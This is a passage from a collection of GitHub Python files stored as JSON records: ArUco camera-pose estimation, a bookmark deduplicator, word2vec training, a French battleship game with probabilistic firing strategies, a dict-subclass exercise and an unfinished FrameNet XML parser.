sector)","repo_name":"gsaurer/python-sonos-nfc","sub_path":"NFCHelper.py","file_name":"NFCHelper.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"74110238964","text":"import cv2\r\nimport numpy as np\r\nimport cv2.aruco as aruco\r\n\r\nfrom additionalFunctions import *\r\n\r\n\r\n# --------------------- Aruco Markers --------------------------\r\ndef cornerPointsAndH(frame1, markerOfInterest=0, drawFrame=True):\r\n '''\r\n finds one arucoMarker of selected Id and returns its pose\r\n in camera CS.\r\n It also returns corners of all markers found in the frame\r\n (sorted with id's ascending)\r\n '''\r\n gray = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)\r\n aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250)\r\n parameters = aruco.DetectorParameters_create()\r\n # Find Markers\r\n corners, ids, rejectedImgPoints = aruco.detectMarkers(gray, aruco_dict, parameters=parameters)\r\n corners = np.array(corners)\r\n # Sort the markes based on Id\r\n indices = np.argsort(ids[:,0])\r\n ids_sorted = ids[indices] \r\n corners = corners[indices]\r\n\r\n # Estimate poses\r\n rvecs, tvecs, objPoints= aruco.estimatePoseSingleMarkers(corners, 70, cameraMatrix, distCoeffs)\r\n # Take out one marker Data (pose as Homogenous matrix)\r\n \r\n \r\n marker0idx = 0\r\n markersWithThisId = (ids == marker0idx).sum()\r\n if markersWithThisId < 1:\r\n print(f'Warning: No markers with id {marker0idx} found!')\r\n elif markersWithThisId > 1:\r\n print(f'Warning: There are multiple ({markersWithThisId}) markers \\\r\n with id {marker0idx} !')\r\n\r\n H_marker0 = vec2homo(tvecs[marker0idx], rvecs[marker0idx])\r\n\r\n # Draw the coordinate frame to the image\r\n if drawFrame:\r\n frame1 = aruco.drawAxis(frame1, cameraMatrix, distCoeffs, \r\n rvecs[marker0idx], tvecs[marker0idx] , 35)\r\n \r\n return corners, H_marker0\r\n\r\n\r\n\r\n\r\n# ### --- Load frames and points ---\r\npath = 'RVSeminarAplikacija/twoCameraViews3.npz'\r\ndata = np.load(path) \r\n# Unpack\r\nframe1 = data['frame1']\r\nframe2 = data['frame2']\r\np1 = data['p1']\r\np2 = data['p2']\r\n# cameraMatrix = data['cameraMatrix']\r\nprint('Data loaded.')\r\n\r\n\r\n\r\n# Load camera parameters:\r\ncameraName = 'EriksPhoneCam'\r\nfolderName = 'CameraCalibration/'\r\ncamParamsName = folderName + cameraName + '.npz'\r\ncamParams = np.load(camParamsName) \r\n\r\nretVal = camParams['retVal']\r\ncameraMatrix = camParams['cameraMatrix']\r\ndistCoeffs = camParams['distCoeffs'] \r\nrvecsCalib = camParams['rvecs']\r\ntvecsCalib = camParams['tvecs']\r\n# print(retVal, cameraMatrix, distCoeffs, rvecsCalib, tvecsCalib)\r\nprint('Camera parameters loaded.')\r\n\r\nnp.set_printoptions(precision=3)\r\nnp.set_printoptions(suppress=True)\r\n\r\n\r\n\r\n\r\n# Camera1 position in marker CS\r\ncorners1, H_frame1 = cornerPointsAndH(frame1, markerOfInterest=0, drawFrame=True)\r\nCam1_inM0 = homoInv(H_frame1)\r\nprint('Cam1_inM0 (camera1 in M0 (global CS)):\\n', Cam1_inM0)\r\n\r\n# Camera2 position in marker CS\r\ncorners2, H_frame2 = cornerPointsAndH(frame2, markerOfInterest=0, drawFrame=True)\r\nCam2_inM0 = homoInv(H_frame2)\r\nprint('Cam2_inM0 (camera2 in M0 (global CS)):\\n', Cam2_inM0)\r\n\r\n# Camera2 position in camera1 CS\r\nCam2_inCam1 = np.dot(homoInv(Cam1_inM0), Cam2_inM0)\r\nprint('*** H_markers (Cam2_inCam1 - camera2 in camera1): ***\\n', Cam2_inCam1)\r\n\r\n\r\n\r\n# Show loaded points\r\nfor point in np.int0(p1):\r\n x,y = point.ravel()\r\n cv2.circle(frame1,(x,y),3,(150, 150, 250),-1)\r\n\r\nfor point in np.int0(p2):\r\n x,y = point.ravel()\r\n cv2.circle(frame2,(x,y),3,(150, 150, 250),-1)\r\n\r\n\r\ncorners1 = np.reshape(corners1, (16, 2))\r\ncorners2 = np.reshape(corners2, (16, 2))\r\n\r\n\r\n# Show detected corners\r\nfor point in np.int0(corners1):\r\n x,y = point.ravel()\r\n cv2.circle(frame1,(x,y),3,(250, 150, 50),-1)\r\n\r\nfor point in np.int0(corners2):\r\n x,y = point.ravel()\r\n cv2.circle(frame2,(x,y),3,(250, 150, 50),-1)\r\n\r\n\r\n\r\n\r\n# --------------------- Pose estimation --------------------------\r\np1 = np.squeeze(p1)\r\np2 = np.squeeze(p2)\r\n\r\nE, maskEs = cv2.findEssentialMat(p1, p2, cameraMatrix) \r\nretval, R, t, maskRp = cv2.recoverPose(E, p1, p2, cameraMatrix)\r\n\r\n# Remove 'bad' points:\r\n# print(f'shape p1 before bad point removal: {p1.shape}')\r\nidx = np.where(maskEs==1)[0]\r\np1 = p1[idx]\r\np2 = p2[idx]\r\n# print(f'shape p1 after bad point removal: {p1.shape}')\r\n\r\n\r\nR = R.T\r\nt = -t\r\nRabs, tabs = homo2Rt(Cam2_inCam1)\r\n\r\nHe = np.hstack((R,t))\r\nHe = np.vstack((He, [0, 0, 0, 1]))\r\nprint('He:\\n', He)\r\n\r\n\r\n# print('-------------------------------------------------------')\r\n# --- 3D points reconstruction\r\npointsEcorners = points3Dreconstruction(corners1, corners2, R.T, -t, cameraMatrix)\r\npointsEstimated = points3Dreconstruction(p1, p2, R.T, -t, cameraMatrix)\r\n# pointsEstimated = points3Dreconstruction(corners1, corners2, Rabs.T, -tabs, cameraMatrix)\r\n# pointsEstimated = points3Dreconstruction(p1, p2, Rabs.T, -tabs, cameraMatrix)\r\n\r\n# print('pointsEstimated 3D shape:', pointsEstimated.shape)\r\n# print('pointsEstimated 3D:', pointsEstimated)\r\n# print('-------------------------------------------------------')\r\n\r\n\r\n# Mark 'good' points (on the camera images):\r\nfor point in np.int0(p1):\r\n x,y = point.ravel()\r\n cv2.circle(frame1,(x,y),3,(50, 200, 0),-1)\r\n\r\nfor point in np.int0(p2):\r\n x,y = point.ravel()\r\n cv2.circle(frame2,(x,y),3,(50, 200, 0),-1)\r\n\r\n\r\n\r\n# Scale:\r\ncornerDistances = []\r\n# print('Computing distances:')\r\nfor i in range(pointsEcorners.shape[0]):\r\n\r\n c1 = pointsEcorners[i,:3]\r\n if i % 4 == 3:\r\n # take the first corner of current marker\r\n c2 = pointsEcorners[i-3,:3]\r\n else:\r\n # take the next corner (of the same marker)\r\n c2 = pointsEcorners[i+1,:3]\r\n cornerDistances.append(np.linalg.norm(c2 - c1))\r\n\r\ncornerDistances = np.array(cornerDistances)\r\nscaleFactor = 70/np.mean(cornerDistances)\r\n\r\n\r\npointsEcorners *= scaleFactor\r\npointsEstimated *= scaleFactor\r\nt *= scaleFactor\r\n\r\nHe = np.hstack((R,t))\r\nHe = np.vstack((He, [0, 0, 0, 1]))\r\nprint('He (estimated) after scale:\\n', He)\r\n\r\n\r\nprint('He - H_markers:\\n', He-Cam2_inCam1)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ncv2.imshow('Frame 1', frame1)\r\ncv2.imshow('Frame 2', frame2)\r\n\r\n# cv2.waitKey(0)\r\nplot3D(pointsEstimated, showOrigin=False)\r\nplot3D(pointsEcorners, showOrigin=False)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"plerik/RV-cameraLocalization","sub_path":"RVSeminarAplikacija/T05_recoverPoseRealImages.py","file_name":"T05_recoverPoseRealImages.py","file_ext":"py","file_size_in_byte":6120,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"32671106446","text":"# opens a netscape bookmark file (format that chrome uses) bookmarks.html, assumes one line = 1 bookmark, and removes any duplicate urls, outputting to bookmarksout.html\n\nimport re\n\n\ndef main():\n with open('bookmarks.html', encoding='utf8') as infile:\n urlset = set()\n linelist = []\n urlre = re.compile(\n r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')\n for line in infile:\n finds = urlre.findall(line)\n if finds:\n found = False\n for find in set(finds):\n find = find.replace(\n 'http://', '').replace('https://', '').strip()\n if find in urlset:\n found = True\n print(find)\n else:\n urlset.add(find)\n if not found:\n linelist.append(line)\n else:\n linelist.append(line)\n with open('bookmarksout.html', 'w', encoding='utf8') as outfile:\n outfile.writelines(linelist)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"johnpm-12/bookmark-deduplicator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"10469266761","text":"import os\nimport gzip\nfrom gensim.models import Word2Vec\nfrom gensim.models.word2vec import LineSentence\n\n\nclass MySentences(object):\n def __init__(self, dirname):\n self.dirname = dirname\n\n def __iter__(self):\n for fname in os.listdir(self.dirname):\n for line in open(os.path.join(self.dirname, fname)):\n yield line.split()\n\ndef read_input(input_file):\n documents = []\n \"\"\"This method reads the input file which is in gzip format\"\"\"\n\n print(\"reading file {0}...this may take a while\".format(input_file))\n with gzip.open(input_file, 'rb') as f:\n for i, line in enumerate(f):\n\n if (i % 10000 == 0):\n print(\"read {0} reviews\".format(i))\n # do some pre-processing and return list of words for each review\n # text\n documents.append(line)\n return documents\n\nsentences = MySentences('/home/jessica/Documentos/UFSCar/Pesquisa/Projeto/sense2vec-master/bin/corpora/corpora/corpora_tokenized') # a memory-friendly iterator\n#documents = read_input('/home/jessica/Documentos/UFSCar/Pesquisa/Projeto/sense2vec-master/bin/corpora/corpora/corpora_tokenized/corpora_tokenized.tar.gz')\nprint('terminou corpus')\n#sg=1: skigram\n#sg=0: cbow\nmodel = Word2Vec(sentences, sg=1, size=300, window=5, min_count=10)\nprint('finish train')\nmodel.init_sims(replace=True)\nmodel.wv.save_word2vec_format('/home/jessica/Documentos/UFSCar/Pesquisa/Projeto/portuguese_word_embeddings/word2vec/word2vec_s300_ptbr_sg.txt', binary=False)\nprint('finish')","repo_name":"techthiyanes/sense-embeddings-pt","sub_path":"baselines/word2vec/word2vec_train.py","file_name":"word2vec_train.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34009107132","text":"#-*- coding: utf-8 -*-\n\nimport numpy as np\nimport random\nimport matplotlib.pyplot as pt\n\n#-------------------------------------------------------------\n# FONCTION\n#-------------------------------------------------------------\ndef liste_bateaux():\n L = []\n L.append(Bateau(\"porte avion\",1,5))\n L.append(Bateau(\"croiseur\",2,4))\n L.append(Bateau(\"contre-torpilleur\", 3,3))\n L.append(Bateau(\"sous-marin\", 4,3))\n L.append(Bateau(\"torpilleur\",5,2))\n return L\n \ndef genere_grille(taille=10):\n g = Grille(taille)\n L = liste_bateaux()\n for b in L:\n g.place_alea(b)\n return g\n \n#Partie Combinatoire du jeu\ndef nb_facon_grille(G,b):\n #Attention la fonction necessite python 3 sinon utiliser les sets\n cpt = 0\n direction = ['h','v']\n for i in range(0,G.taille):\n for j in range(0,G.taille):\n for d in direction:\n if G.peut_placer(b,(i,j),d):\n cpt += 1\n return cpt\n\ndef nb_place_kBateauRec(G,L):\n #on fixe recursivement les differents bateaux\n nbgrille = 0\n if len(L) == 1:\n #On calcule le nombre de facon de placer le dernier bateau\n return nb_facon_grille(G,L[0])\n else:\n direction = ['h','v']\n for i in range(0,G.taille):\n for j in range(0,G.taille):\n for d in direction:\n if G.peut_placer(L[0],(i,j),d):\n G.place(L[0],(i,j),d)\n nbgrille += nb_place_kBateauRec(G,L[1:])\n G.enleve(L[0],(i,j),d)\n return nbgrille\n\n\n#APPROXIMATION A FAIRE (TOUT DOUX)>.<\n\ndef nb_place_kBateauRec_Memoisation(G,L,dico):\n #apparament comme G est un objet statique ne marche pas\n TailleBateau = []\n for i in L:\n TailleBateau.append(i.taille)\n if (G.matrice,TailleBateau) in dico:\n return dico[(G.matrice,TailleBateau)]\n nbgrille = 0\n if len(L) == 1:\n #On calcule le nombre de facon de placer le dernier bateau\n n = nb_facon_grille(G,L[0])\n dico[(G.matrice,L)] = n\n return n\n else:\n direction = ['h','v']\n for i in range(0,G.taille):\n for j in range(0,G.taille):\n for d in direction:\n if G.peut_placer(L[0],(i,j),d):\n G.place(L[0],(i,j),d)\n nbgrille += nb_place_kBateauRec(G.matrice,L[1:])\n G.enleve(L[0],(i,j),d)\n dico[(G.matrice,L)] = nbgrille\n return nbgrille\n\ndef genere_grille_egale(G):\n cpt = 1\n Galea = genere_grille(G.taille)\n while Galea != G:\n cpt += 1\n Galea = genere_grille(G.taille)\n return cpt\n\n#-----------------------------------------------\n# CLASSES\n#-----------------------------------------------\n\nclass Grille(object):\n def __init__(self, taille=10):\n self.taille = taille\n self.matrice = np.zeros((taille,taille))\n\n def __repr__(self):\n return \"Grille : \\n {}\".format(self.matrice)\n\n def __eq__(self, grilleB):\n for i in range(grilleB.taille):\n for j in range(grilleB.taille):\n if grilleB.matrice[i,j] != self.matrice[i,j]:\n return False\n return True\n \n\n def show(self,title=\"Bataille navale TAVU\"):\n pt.imshow(self.matrice, interpolation=\"nearest\")\n pt.title(title)\n pt.show()\n\n def peut_placer(self,bateau, position, direction):\n \n for i in range(bateau.taille):\n if (direction == 'h'):\n x = position[0] + i\n y = position[1]\n else:\n x = position[0]\n y = position[1] + i\n if x >= self.taille or y >= self.taille or x < 0 or y < 0:\n return False\n if self.matrice[x,y] != 0:\n return False\n return True\n\n def place(self,bateau, position, direction):\n #Attention le bateau est toujours placer vers la droite ou le bas par convention\n if not(self.peut_placer(bateau, position , direction)):\n b = False\n # print(\"impossible de placer le bateau renvoi l'ancienne grille\")\n else:\n for i in range(bateau.taille):\n if (direction == 'h'):\n x = position[0] + i\n y = position[1]\n else:\n x = position[0]\n y = position[1] + i\n self.matrice[x,y] = bateau.idB\n\n def place_alea(self,bateau):\n x = random.randint(0,self.taille-1)\n y = random.randint(0,self.taille-1)\n direction = ['h','v']\n indDir = direction[random.randint(0,1)]\n while self.peut_placer(bateau,(x,y),indDir) == False:\n x = random.randint(0,self.taille-1)\n y = random.randint(0,self.taille-1)\n indDir = direction[random.randint(0,1)]\n return self.place(bateau,(x,y), indDir)\n\n def enleve(self,bateau, position, direction):\n for i in range(bateau.taille):\n if (direction == 'h'):\n x = position[0] + i\n y = position[1]\n else:\n x = position[0]\n y = position[1] + i\n self.matrice[x,y] = 0\n\n\nclass Bateau(object):\n def __init__(self,nom=\"RAOUL\",idB=1,taille=1):\n self.taille = taille\n self.nom = nom\n self.idB = idB\n\n def __repr__(self):\n return \"nom : {} , taille : {}, id : {}\".format(self.nom, self.taille, self.idB)\n\nclass Joueur(object):\n def __init__(self,nom=\"J1\",taille=10, ListeBateauAdv=liste_bateaux()):\n \"\"\"Correspond a un joueur de bataille navale, possede une Grille et une Grille remplis de : 0 si la case non exploré, -1 si le coup a raté et 1 si il a touché un bateau\"\"\"\n self.nom = nom\n self.taille = taille\n self.MaGrille = genere_grille(taille)\n self.GrilleAdv = Grille()\n self.ListeBateauAdv = ListeBateauAdv\n self.ListeBateauNonCouler = ListeBateauAdv[::]\n self.GrilleProba = Grille()\n\n def Tir(self,Adv,i,j):\n \"\"\" Grille,int,int -> met a jour GrilleAdv\"\"\" \n if Adv.matrice[(i,j)] == 0:\n #aucun bateau n'a ete touché\n self.GrilleAdv.matrice[(i,j)] = -1\n return False\n else:\n self.GrilleAdv.matrice[(i,j)] = 1\n return True\n\n def Aleatoire(self,Adv):\n \"\"\" Grille -> (boolean, int, int) \n Appelle la fonction Tir\"\"\"\n x = random.randint(0,Adv.taille-1)\n y = random.randint(0,Adv.taille-1)\n #si la case n'a pas encore été exploré\n while(self.GrilleAdv.matrice[(x,y)] != 0):\n x = random.randint(0,Adv.taille-1)\n y = random.randint(0,Adv.taille-1)\n #print(\"(x,y) : ({},{})\".format(x,y))\n return (self.Tir(Adv,x,y),x,y)\n\n def Coup_Cible(self,Adv,x,y):\n #on peut ameliorer la fonction car si il trouve a gauche chercher seulement a droite apres et inversement de meme pour haut et bas\n cpt = 0\n curseur = 1\n #explore a droite\n while x+curseur < Adv.taille and self.Tir(Adv,x+curseur,y):\n curseur += 1\n cpt += 1\n curseur = 0\n #gauche\n while x-curseur >= 0 and self.Tir(Adv,x-curseur,y):\n curseur += 1\n cpt += 1\n curseur = 0\n #bas\n while y+curseur < Adv.taille and self.Tir(Adv,x,y+curseur):\n curseur += 1\n cpt += 1\n curseur = 0\n #haut\n while y-curseur >= 0 and self.Tir(Adv,x,y-curseur):\n curseur += 1\n cpt += 1\n curseur = 0\n return cpt\n \n \n def BateauCouler(self,Adv,idBateau):\n for x in range(Adv.taille):\n for y in range(Adv.taille):\n if Adv.matrice[(x,y)] == idBateau and self.GrilleAdv.matrice[(x,y)] != 1:\n return False\n return True\n\n def ResteBateau(self,Adv):\n for bateau in self.ListeBateauAdv:\n if not(self.BateauCouler(Adv,bateau.idB)):\n return True\n return False\n\n def ActualiseBateaucouler(self,Adv):\n b = True\n for bateau in self.ListeBateauAdv:\n if self.BateauCouler(Adv,bateau.idB) and bateau in self.ListeBateauNonCouler:\n self.ListeBateauNonCouler.remove(bateau)\n #print(\"bateau restant : \",self.ListeBateauNonCouler)\n \n\n def StrategieAleatoire(self,Adv):\n cpt = 0\n while self.ResteBateau(Adv):\n self.Aleatoire(Adv)\n cpt += 1\n return cpt\n\n def StrategieHeuristique(self,Adv):\n cpt = 0\n while self.ResteBateau(Adv):\n (b,i,j) = self.Aleatoire(Adv)\n cpt += 1\n #tant qu'il n'a pas touché une case\n while b != True:\n #La fonction aleatoire tire renvoi un boolean et la case\n (b,i,j) = self.Aleatoire(Adv)\n cpt += 1\n print(\"entrer coup cible : ({},{})\".format(i,j))\n cpt += self.Coup_Cible(Adv,i,j)\n return cpt\n\n def peut_placer_proba(self,bateau, position, direction):\n for i in range(bateau.taille):\n if (direction == 'h'):\n x = position[0] + i\n y = position[1]\n else:\n x = position[0]\n y = position[1] + i\n if x >= self.GrilleAdv.taille or y >= self.GrilleAdv.taille or x < 0 or y < 0:\n return False\n if self.GrilleAdv.matrice[x,y] == -1:\n return False\n return True\n \n def PossibiliteBateauSurCase(self,b,x,y):\n \"\"\" Retourne si le bateau b peut être sur la case x,y en fonction des cases explorées\n amelioration possible\"\"\"\n\n nb = 0\n #probleme car il y a des cas ou on peux placer le bateau et la matrice de probab est vide\n for i in range(b.taille,0,-1):\n if self.peut_placer_proba(b,(x-i,y),'h'):\n nb += 1\n if self.peut_placer_proba(b,(x,y-i),'v'):\n nb += 1\n return nb\n\n\n def MatriceProba(self, b):\n \"\"\" Renvoie un tuple (b, GrilleProba) avec b = false si on peut placer le bateau nule part\"\"\" \n GrilleProba = Grille()\n cpt = 0\n somme = 0\n #on calcule le nombre de position possible\n for x in range(self.GrilleAdv.taille):\n for y in range(self.GrilleAdv.taille):\n cpt += self.PossibiliteBateauSurCase(b,x,y)\n if cpt == 0:\n return (False, GrilleProba)\n #on actualise la matrice\n for x in range(self.GrilleAdv.taille):\n for y in range(self.GrilleAdv.taille):\n nb = (float)(self.PossibiliteBateauSurCase(b,x,y))\n somme += nb/cpt\n GrilleProba.matrice[(x,y)] = nb/cpt\n #print(\"la somme des probabilité pour le bateau {} est : {}\".format(b,somme))\n return (True, GrilleProba)\n \n def UpdateGrilleProba(self):\n cpt = 0\n debug = True\n self.GrilleProba.matrice = np.zeros((self.GrilleProba.taille,self.GrilleProba.taille))\n #probleme : on regarde encore les bateaux qui ont été coulé, aussi on a des fois ou on actualise pas la matrice\n if self.ListeBateauNonCouler == []:\n return debug\n for b in self.ListeBateauNonCouler:\n #si on peut placer le bateau\n if self.MatriceProba(b)[0]:\n self.GrilleProba.matrice = np.add(self.GrilleProba.matrice, self.MatriceProba(b)[1].matrice)\n debug = False\n #print(\"le bateau {} a une position possible sur la grille\".format(b))\n return debug\n\n def StrategieProbaSimple(self,Adv):\n \"\"\" La strategie est moins efficace que heuristique\"\"\"\n cpt = 0\n while self.ResteBateau(Adv):\n maxPb = 0\n xMax = 0\n yMax = 0\n #au bout d'un moment update grille proba ne s'actualise pas\n self.UpdateGrilleProba()\n for x in range(self.GrilleProba.taille):\n for y in range(self.GrilleProba.taille):\n #on verifie que la case n'a pas été deja exploré\n if ((self.GrilleProba.matrice[(x,y)] >= maxPb) and (self.GrilleAdv.matrice[(x,y)] == 0)):\n #print(\"point de la grille : \",self.GrilleAdv.matrice[(x,y)])\n #print(\"valeur de verité : \",self.GrilleAdv.matrice[(x,y)] == 0)\n maxPb = self.GrilleProba.matrice[(x,y)]\n xMax = x\n yMax = y\n #print(self.GrilleProba.matrice)\n self.Tir(Adv,xMax,yMax)\n print(\"tire sur la case ({},{})\".format(xMax,yMax))\n self.ActualiseBateaucouler(Adv)\n cpt += 1\n self.UpdateGrilleProba()\n return cpt\n\n def StrategieProbaEtHeuristique(self,Adv):\n \"\"\" Marche mal ne pas utiliser\"\"\"\n cpt = 0\n b = False\n while self.ResteBateau(Adv):\n while b != True:\n maxPb = 0\n xMax = 0\n yMax = 0\n self.UpdateGrilleProba()\n for x in range(self.GrilleProba.taille):\n for y in range(self.GrilleProba.taille):\n #on verifie que la case n'a pas été deja exploré\n if ((self.GrilleProba.matrice[(x,y)] >= maxPb) and (self.GrilleAdv.matrice[(x,y)] == 0)):\n maxPb = self.GrilleProba.matrice[(x,y)]\n xMax = x\n yMax = y\n b = self.Tir(Adv,xMax,yMax)\n print(\"Tir en ({},{})\".format(xMax,yMax))\n cpt += 1\n if not(self.ResteBateau(Adv)):\n return cpt\n print(\"Entrer Coup_Cible({},{})\".format(xMax,yMax))\n cpt += self.Coup_Cible(Adv,xMax,yMax)\n b = False\n return cpt\n\n# if __name__ == \"__main__\":\n#g = genere_grille(4)\n#g.show()\ng2 = Grille(3)\nL = liste_bateaux()\ntest = []\ntest.append(L[-2])\ntest.append(L[-2])\ntest.append(L[-2])\n\nprint(test)\nprint(\"version recursive : \")\nRec = nb_place_kBateauRec(g2,test)\nprint(Rec)\ndico = dict()\n#nb = genere_grille_egale(g)\n#print(\"Nombre de tentative avant d'obtenir la meme grille : \",nb)\n\nj1 = Joueur()\nadv = genere_grille()\nprint(adv)\nn = j1.StrategieHeuristique(adv)\nprint(\"nombre de coup : \",n)\nprint(\"matrice probabiliste :\",j1.GrilleProba.matrice)\nj1.GrilleAdv.show(\"matrice d'exploration\")\nadv.show(\"matrice de l'adversaire\")\n","repo_name":"lucas-becirspahic/Stat","sub_path":"Projet1/projet.py","file_name":"projet.py","file_ext":"py","file_size_in_byte":14757,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36143038330","text":"class MyDict(dict):\n def get(self, key):\n if key in self:\n return self[key]\n else:\n return 0\n\n\ndict_1 = {'0': '00', '1': '11', '2': '22'}\n\nprint(dict_1.get('1'))\nprint(dict_1.get('4'))\n\ndict_2 = MyDict()\ndict_2['0'] = '000'\ndict_2['1'] = '111'\n\nprint(dict_2.get('1'))\nprint(dict_2.get('4'))\n\n# не понимаю, как исправить метод get, что-бы по умолчанию возвращать не None, а число 0.\n# Как я понимаю, класс class MyDict(dict) нужно наследовать от класса dict, в котором есть метод get, который и надо\n# переопределить. Но я вижу только такой код\n\n# class dict(object):\n# def get(self, *args, **kwargs): # real signature unknown\n# \"\"\" Return the value for key if key is in the dictionary, else default. \"\"\"\n# pass\n# где найти код метода get, который нужно переопределить? Или другое решение должно-быть?\n\n# вариант с MyDict(dict) правильный и в этом классе необходимо описать метод get.\n# Сам объект dict менять при это не нужно.\n\n# зачёт!\n","repo_name":"MikhailRyskin/Lessons","sub_path":"Module25/03_my_dict/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8925967955","text":"\"\"\"\nObjectification: Ce fichier essaie de mettre de l'ordre dans les fonctions et dans le Main, afin de clarifier la structure du code. ( par le changement en POO)\n\"\"\"\nclass structure():\n \"\"\"\n This class reprensents a general structure, sentences or substrings of the sentence\n It is made to unify our way to select the main node, whether it is a sentence, or simply a span.\n It will have the following attributes:\n - range: a range of values for characters. ( I.e. (0, end of sentence) for a sentence, or the span of the cluster for a cluster .\n - annotations: a (sub)set of annotations\n - main : the most proeminent node, by semantics, or in last resort by syntax.\n - clusterdict: a dictionary of clusters inside the structure.\n - allspans: the list of all spans present inside the annotation ( mainly present to generalize the cluster function)\n - subclusters: a set oc\n \"\"\"\n def selectMain(self):\n \"\"\"\n This function selects the main element from the structure, assuming that everything have been cleared.\n \"\"\"\n pass\n def extract(self):\n \"\"\"\n This function extracts all spans and \n \"\"\"\n pass\n\n\nclass sentence(structure):\n \"\"\"\n This class is a sentence.\n \"\"\"\n #attributes:\n \"\"\"\n Comme attributs, on aura l'ensemble des termes annotés et le texte\n - lu: set of LU objects\n - id: son id.\n - texte: l'énoncé\n - annotations: l'ensemble des termes annotés\n - lemmas : dict [tuple, lemma ]\n - redirections: dict [tuple, tuple]\n - affined: bool ( si on a nettoyé l'objet)\n - rel_ant: dict ( rel:ant -> par span)\n - allspans( utile pour nos clusters par la suite... )\n \"\"\"\n text=str()\n\n #methods:\n \"\"\"\n comme méthode(s):\n - parse_from_xml() : parse le xml, et retourne les annotations[brutes]\n - affine() : prend les annotations brutes, et en fait une version plus propre <- la méthode la plus complexe.\n - to_mate(): renvoie une string en format Mate\n \"\"\"\n def parse_from_xml(self, AS, prefix):\n \"\"\"\n This function takes as an input the xml structure and updates every field according to the annotation, without further treatment.\n Input:\n AS : an XML.etree.elementTree object (annotation set)\n prefix: a constant string for parsing the xml, using Etree.\n Output: none, updates the object.\n \"\"\"\n self.text=AS.find(prefix+'text').text# we update the text string.\n annotations=AS.findall(prefix+'annotationSet[@frameName]')\n self.annotations={}\n self.allspans={}\n for lu in annotations:\n span=(lu.find('.//'+prefix+\"label[@name='Target']\").attrib['start'], lu.find('.//'+prefix+\"label[@name='Target']\").attrib['end'])# we select the span of the target\n lexical_unit=LU(lemma=lu.attrib['luName'], frame=lu.attrib['frameName'], lu_id=lu.attrib['ID'], span=span) # we build the lexical unit\n self.allspans.add(span) # update the list of spans\n semannots=lu.findall('.//'+prefix+\"layer[@name='FE']/\"+prefix+'label[@name]')# select the list of semantics annotations\n for element in semannots:\n if 'start' in element.attrib: # the semantic frames that are not a Null instanciation\n span=(element.attrib['start'], element.attrib['end'])\n self.allspans.add(span)# we add the span to the list of spans\n lexical_unit.add_semantics(span, element.attrib['name'])# the lexical_unit's annotation is updated.\n else:\n lexical_unit.add_semantics(element.attrib['itype'], element.attrib['name'])\n syntannots= lu.findall('.//'+prefix+\"layer[@name='GF']/\"+prefix+'label[@name]')\n for element in syntannots:\n if element['name']!='head':\n lexical_unit.add_syntax((element.attrib['start'], element.attrib['end']), element.attrib['name'] )\n else:\n if element['name'] == 'head':\n toreverse.add( (element.attrib['start'], element.attrib['end']), (lu.find('.//'+prefix+\"label[@name='Target']\").attrib['start'], lu.find('.//'+prefix+\"label[@name='Target']\").attrib['end']) )\n rel_annots= lu.findall('.//'+prefix+\"layer[@name='Other']/\"+prefix+'label[@name]')\n for element in rel_annots:\n rel_ant.add((element.attrib['start'], element.attrib['end'], element.attrib['name']))\n\n self.annotations.add(lexical_unit)# we add the lexical unit in our structure.\n for element in toreverse: #iterating over every 'head' GF, and cleaning it\n i=False# an indicator whether we have to create the LU manually\n for elt in annotations:\n if elt.span==element[0]:\n elt.add_syntax(element[1], 'rhead')# updating the syntax\n i=True\n break\n if i==False:# if no element can be updated, we simply add an Ad Hoc LU in our annotations.\n self.annotations.add(LU(span=element[0], syntax={(element[1],'rhead')}))\n\n # def get_main(self): MOVED TO STRUCTURE CLASS\n # \"\"\"\n # This function will return the main LU from the set of annotations\n # \"\"\"\n # pass\n\n # def resolve_clusters(self): MOVED TO STRUCTURE CLASS\n # \"\"\"\n # This function will take a cluster, and return its head\n # \"\"\"\n # pass\n\n def redirect_cluster(self, redirectionDict):\n \"\"\"\n this function takes the redirectionDict, and scans through all LUs to redirect accordingly.\n \"\"\"\n for lu in self.annotations:\n synchange=set()\n for element in lu.syntax:\n if element[0] in redirectionDict.keys():\n synchange.add((element[0], redirectionDict[element[0]], element[1]))\n for element in synchange:\n lu.remove_syntax(element[0])\n lu.add_syntax((element[1], element[2]))\n semchange=set()\n for element in lu.semantics:\n if element[0] in redirectionDict.keys():\n semchange.add((element[0], redirectionDict[element[0]], element[1]))\n for element in semchange:\n lu.remove_semantics(element[0])\n lu.add_semantics(element[1],element[2])\n def lemmatiser(self):\n \"\"\"\n This function will first build a dictionnary of all the lemmas, and then transform the LUs accordingly\n First step: extract lemmas\n \"\"\"\n lemmas=dict()\n for lu in annotations: # this extracts the lemmas from the annotations( 1st pass)\n if lu.lemma not in lemmas.values():\n lemmas[lu.span]=lu.lemma\n else:#if there already is an instance of this lemma\n i=1\n while lu.lemma+':'+str(i) in lemmas.values():\n i+=1\n lemmas[lu.span]=lu.lemma+':'+str(i)\n # here there is code to build a lemma's dictionnary (span: lemma)\n ## second step: extract textual lemmas from the rest of the structure; to do so, we take all spans, remove the one in the lemmas' keys, and\n restofspans={span for span in allspans if span not in lemmas.keys()}\n for span in restofspans:\n if re.escape(self.text[span[0]:span[1]+1]) not in lemmas.values():\n lemmas[span]=re.escape(self.text[span[0]:span[1]+1])\n else:\n i=1\n while re.escape(self.text[span[0]:span[1]+1]+':'+str(i)) in lemmas.values():\n 